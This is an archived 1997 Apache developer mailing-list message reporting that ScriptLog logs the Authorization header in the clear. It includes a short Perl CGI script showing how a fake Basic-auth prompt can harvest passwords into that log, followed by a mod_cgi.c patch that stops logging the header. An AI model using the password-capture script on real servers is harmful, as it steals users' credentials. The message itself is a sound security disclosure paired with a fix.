httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Rob Hartill <r...@imdb.com>
Subject security hole with ScriptLog
Date Sun, 12 Jan 1997 01:33:33 GMT

Apart from the fact that ScriptLog can dump the "Authorization" header
into the log when authorized scripts barf, it's not too difficult to
difficult to come up with ways to trigger Auth in other areas of the
server to capture passwords in the clear.

Here's a script that causes a 500 error when it thinks it's got the
password from the user..


#!/usr/local/bin/perl

open(GOTCHA, "+</tmp/grab");
while(<GOTCHA>) {
	chomp; 
	if ($ENV{REMOTE_HOST} eq $_) {   # been here before ? if so, die.
             exit;  # 500 error, password now in ScriptLog
	}
}

# Prompt the user for a password
print "Status: 401\r\nWWW-Authenticate: Basic realm=\"not-mine\"\r\n\r\n";

# remember who's been sent a 401
print GOTCHA "$ENV{REMOTE_HOST}\n"; close GOTCHA;

-=-=-=-=-=-

This'll cover the hole until someone works out a way to enable this feature
safely.

Index: mod_cgi.c
===================================================================
RCS file: /export/home/cvs/apache/src/mod_cgi.c,v
retrieving revision 1.4
diff -u -r1.4 mod_cgi.c
--- mod_cgi.c   1997/01/02 03:34:57     1.4
+++ mod_cgi.c   1997/01/12 01:29:12
@@ -212,6 +212,7 @@
     fputs("%request\n", f);
     for (i = 0; i < hdrs_arr->nelts; ++i) {
       if (!hdrs[i].key) continue;
+      if (!strcmp(hdrs[i].key, "Authorization")) continue;
       fprintf(f, "%s: %s\n", hdrs[i].key, hdrs[i].val);
     }
     if ((r->method_number == M_POST || r->method_number == M_PUT)


Mime
View raw message